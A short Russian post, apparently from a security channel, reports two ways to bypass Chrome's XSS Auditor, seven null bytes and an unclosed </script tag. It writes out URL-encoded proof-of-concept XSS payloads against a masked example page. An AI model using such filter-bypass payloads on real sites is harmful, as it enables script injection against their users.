Совсем недавно чувак с именем fabrizio обошел Chrome XSS Auditor с помощью... Нульбайта. Точнее семи нульбайтов:◼️.ws/example.php?xss=%3Chello%3E%00%00%00%00%00%00%00%3Cscript%3Ealert(%27pew%27)%3C/script%3E" target="_blank" rel="noopener">◼️.ws/example.php?xss=%3Chello%3E%00%00%00%00%00%00%00%3Cscript%3Ealert(%27pew%27)%3C/script%3EНе менее забавная находка - незакрытый тег </script, с условием, что после него будет перенос строки:◼️.ws/example.php?xss=%3Cscript%3Ealert(%27pew%27)%3C/script" target="_blank" rel="noopener">◼️.ws/example.php?xss=%3Cscript%3Ealert(%27pew%27)%3C/script¯\_(ツ)_/¯